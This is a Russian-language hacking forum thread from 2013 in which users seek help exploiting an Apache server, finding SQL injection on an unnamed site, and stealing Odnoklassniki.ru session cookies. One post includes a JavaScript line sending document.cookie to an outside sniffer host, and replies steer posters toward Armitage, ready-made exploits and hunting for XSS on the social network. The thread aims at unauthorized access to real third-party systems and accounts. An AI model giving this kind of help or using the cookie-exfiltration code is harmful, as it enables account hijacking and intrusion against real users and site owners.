
01.08.2013, 01:00
|
|
Познающий
Регистрация: 10.11.2011
Сообщений: 76
С нами:
7634486
Репутация:
13
|
|
Если тебе несложно, подскажи пожалуйста прямой путь к уязвимости.
Спасибо!
|
|
|

01.08.2013, 01:00
|
|
Участник форума
Регистрация: 06.07.2009
Сообщений: 214
С нами:
8867637
Репутация:
27
|
|
Подскажите как я могу этим воспользоваться.
|
|
|

01.08.2013, 01:00
|
|
Участник форума
Регистрация: 02.04.2013
Сообщений: 149
С нами:
6901526
Репутация:
53
|
|
Хы, да тебе повезло. Ты можешь захапать себе весь сервер, т.к в этой Apache есть уязвимость.
Но она вроде работает под бздями (BSD), с SunOs может не прокатить, но все равно попробуй.
Тебе нужно использовать Exploit. Скачай набор Backtrack или Kali Linux.
Там есть такая штука, называется Armitage. Погугли как ей пользоваться)
|
|
|

16.08.2013, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Лучше нагуглить отдельно сплойт и запустить его под своей системой. Качать и ставить целую ОСь ради единичной попытки пробить теоретически уязвимую софтину... гм. Нерационально.
|
|
|

05.10.2013, 01:00
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 9
С нами:
6659606
Репутация:
0
|
|
всем привет. помогите пожалуйста найти на сайте Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
sql уязвимость. у меня что то никак не получается.
|
|
|

07.10.2013, 01:00
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 9
С нами:
6659606
Репутация:
0
|
|
Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
что это? похоже на инклуд?
|
|
|

08.10.2013, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Похоже было сначала, но проинклудить что-либо не удалось
|
|
|

25.10.2013, 01:00
|
|
Новичок
Регистрация: 02.07.2011
Сообщений: 4
С нами:
7823126
Репутация:
0
|
|
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене
img.src="http://snifer.ejan.ru/img.php?"+document.cookie;
я хочу взломать странички одноклассники.ру и там ставить мой сципт не получится ))) я могу так собирать куки из одноклассники.ру и хочу это отправить в сниффер
!function (d, id, did, st) {
var js = d.createElement("script");
js.src = "http://snifer.ejan.ru/connect.js";
js.onload = js.onreadystatechange = function () {
if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
if (!this.executed) {
this.executed = true;
setTimeout(function () {
OK.CONNECT.insertGroupWidget(id,did,st);
}, 0);
}
}}
d.documentElement.appendChild(js);
}(document,"ok_group_widget","52864984219766","{wi dth:250,height:335}");
|
|
|

25.10.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами:
7774166
Репутация:
255
|
|
Цитата:
Сообщение от djhovo09
здравствуйте , я хочу украсть куки через йфраме ,но не получается потому что кукиси на втором домене
Правильно, у тебя и не получиться украсть куки с другого домена.
Ищи пасивку/активку на одноклассниках и действуй, я больше чем уверен - xss там есть
|
|
|

03.11.2013, 01:00
|
|
Новичок
Регистрация: 03.11.2013
Сообщений: 12
С нами:
6591926
Репутация:
-1
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|